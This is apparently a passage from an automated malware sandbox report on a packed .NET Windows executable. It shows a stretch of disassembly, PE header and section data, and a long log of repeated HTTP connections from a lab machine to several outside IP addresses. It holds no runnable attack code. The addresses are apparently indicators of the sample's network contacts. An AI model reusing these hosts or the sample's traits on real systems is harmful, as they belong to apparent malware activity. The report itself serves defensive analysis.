                                                                              add byte ptr [ebp+00h], bl
                                                                              add byte ptr [eax], al
                                                                              pop edi
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edx+00h], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [esi], cl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edi], bl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edx], ch
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax+00h], dl
                                                                              add byte ptr [ebx+00h], al
                                                                              add byte ptr [eax], al
                                                                              pop ebx
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax+00h], ah
                                                                              add byte ptr [ecx], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax], al
                                                                              add byte ptr [eax], al
                                                                              or dword ptr [eax], eax
                                                                              add byte ptr [eax], al
                                                                              adc eax, 1C000000h
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [ebx], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edi+00h], al
                                                                              add byte ptr [eax], al
                                                                              push eax
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edi], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edx], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [ebx], dl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax], bh
                                                                              add byte ptr [eax], al
                                                                              sbb byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              dec ecx
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [ebx+00h], cl
                                                                              add byte ptr [eax], al
                                                                              dec edi
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xdc6c80x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xde0000x59f4.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xda7a00xda800a4ee16f8d4a5354ebf43954f0d064572False0.9290070348255148data7.844873716049532IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xde0000x59f40x5a00df99a1408cff00c9dd11148f731c7bb0False0.9312065972222222data7.85816581647925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xe40000xc0x200235bbaff56821669be47b8fd778194adFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xde1000x531aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.968083106138949
                                                                              RT_GROUP_ICON0xe342c0x14data1.05
                                                                              RT_VERSION0xe34500x3a4data0.4366952789699571
                                                                              RT_MANIFEST0xe38040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 2, 2024 14:43:35.037091017 CET4982080192.168.2.1031.186.11.114
                                                                              Dec 2, 2024 14:43:35.157355070 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:35.157510996 CET4982080192.168.2.1031.186.11.114
                                                                              Dec 2, 2024 14:43:35.167638063 CET4982080192.168.2.1031.186.11.114
                                                                              Dec 2, 2024 14:43:35.287668943 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:36.637901068 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:36.637945890 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:36.637959957 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:36.638166904 CET4982080192.168.2.1031.186.11.114
                                                                              Dec 2, 2024 14:43:36.641478062 CET4982080192.168.2.1031.186.11.114
                                                                              Dec 2, 2024 14:43:36.761459112 CET804982031.186.11.114192.168.2.10
                                                                              Dec 2, 2024 14:43:53.361778975 CET4986080192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:53.481724977 CET8049860194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:53.482042074 CET4986080192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:53.496704102 CET4986080192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:53.616806984 CET8049860194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:54.896246910 CET8049860194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:54.896403074 CET8049860194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:54.896450043 CET4986080192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:55.007061005 CET4986080192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:56.026067019 CET4986680192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:56.146177053 CET8049866194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:56.146264076 CET4986680192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:56.163120985 CET4986680192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:56.283067942 CET8049866194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:57.561367035 CET8049866194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:57.561387062 CET8049866194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:57.561467886 CET4986680192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:57.678987026 CET4986680192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:58.698268890 CET4987280192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:58.818413019 CET8049872194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:58.818624973 CET4987280192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:58.833781004 CET4987280192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:43:58.954026937 CET8049872194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:43:58.954045057 CET8049872194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:00.196142912 CET8049872194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:00.196192026 CET8049872194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:00.196260929 CET4987280192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:00.335387945 CET4987280192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:01.360833883 CET4987980192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:01.480829954 CET8049879194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:01.480917931 CET4987980192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:01.490506887 CET4987980192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:01.610505104 CET8049879194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:02.857950926 CET8049879194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:02.857975006 CET8049879194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:02.858119011 CET4987980192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:02.861008883 CET4987980192.168.2.10194.76.119.60
                                                                              Dec 2, 2024 14:44:02.981067896 CET8049879194.76.119.60192.168.2.10
                                                                              Dec 2, 2024 14:44:09.079822063 CET4989680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:09.200072050 CET8049896103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:09.202050924 CET4989680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:09.216964006 CET4989680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:09.337054968 CET8049896103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:10.494709015 CET8049896103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:10.494858027 CET8049896103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:10.494904041 CET4989680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:10.726252079 CET4989680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:11.744534016 CET4990280192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:11.864824057 CET8049902103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:11.864916086 CET4990280192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:11.880659103 CET4990280192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:12.000677109 CET8049902103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:13.149802923 CET8049902103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:13.149842978 CET8049902103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:13.150181055 CET4990280192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:13.382710934 CET4990280192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:14.401377916 CET4990980192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:14.521303892 CET8049909103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:14.521462917 CET4990980192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:14.536616087 CET4990980192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:14.656661034 CET8049909103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:14.656678915 CET8049909103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:15.869857073 CET8049909103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:15.870467901 CET8049909103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:15.870517015 CET4990980192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:16.038479090 CET4990980192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:17.057332993 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:17.177459002 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:17.177630901 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:17.193768024 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:17.313898087 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.467788935 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.467842102 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.467856884 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.468077898 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:18.470793962 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:18.590739012 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:24.018384933 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.138380051 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:24.141968012 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.162108898 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.282464027 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.368513107 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.369875908 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.369931936 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:25.663434029 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.682125092 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.802165985 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:26.802371025 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.817049026 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.937175035 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994410992 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994764090 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994997978 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:28.319655895 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.338359118 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.458712101 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:29.458792925 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.473859072 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.594417095 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:29.594434977 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642689943 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642822981 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642872095 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:30.976620913 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:31.999120951 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.119117975 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:32.119195938 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.132716894 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.252712965 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.346755981 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.346962929 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.347187996 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.347840071 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.348000050 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.350131989 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.470124960 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:38.861920118 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:38.981995106 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:38.989960909 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:39.001931906 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:39.122040987 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:40.141227007 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:40.141288042 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:40.507205963 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:40.627222061 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:41.526300907 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.646354914 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:41.650702000 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.690571070 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.810870886 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:42.747303963 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:42.747396946 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:43.194890022 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:43.315633059 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.214683056 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.334726095 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.334814072 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.355114937 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.475373983 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.475441933 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:45.523804903 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:45.524384975 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:45.866584063 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:45.988030910 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:46.885293007 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.005316019 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:47.005578041 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.015214920 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.135993004 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194793940 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194895983 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194947004 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:48.199589968 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:48.319596052 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:53.737984896 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.858251095 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:53.858349085 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.878459930 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.998632908 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102485895 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102509975 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102580070 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102750063 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:55.382371902 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.401866913 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.522125006 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:56.522341967 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.539814949 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.660017014 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858855009 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858875036 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858887911 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858920097 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:57.858968973 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:58.054140091 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.077414036 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.198229074 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:59.202054977 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.225997925 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.346199989 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:59.346354008 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.539998055 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540040970 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540054083 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540112019 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:00.726115942 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.748755932 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.869040966 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:01.869122028 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.880819082 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:02.001020908 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208888054 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208905935 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208923101 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208930969 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.209063053 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.209136009 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.216101885 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.336087942 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:09.581465006 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.701464891 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:09.701575994 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.718020916 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.838088989 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.207480907 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.207511902 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.209543943 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:11.226481915 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.245404959 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.365552902 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:12.365653992 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.383399963 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.503518105 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.897929907 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:13.911417961 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.911468983 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.911484003 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:13.911524057 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:14.018205881 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:14.018270016 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:14.916771889 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.036895037 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:15.037005901 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.053141117 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.173166990 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:15.173191071 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.554229021 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.625010967 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.625045061 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.625082016 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.625118017 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.674319983 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.674372911 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.574012041 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.694070101 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:17.694232941 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.706048965 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.826211929 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.282972097 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.283031940 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.283193111 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:19.286654949 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:19.406872034 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:25.500086069 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.620229959 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:25.620552063 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.636650085 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.756755114 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.150043011 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.169576883 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.169658899 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.169708967 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.169779062 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.270083904 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.270176888 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.166590929 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.287024975 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:28.287139893 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.304949045 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.425354958 CET8050003101.35.209.183192.168.2.10
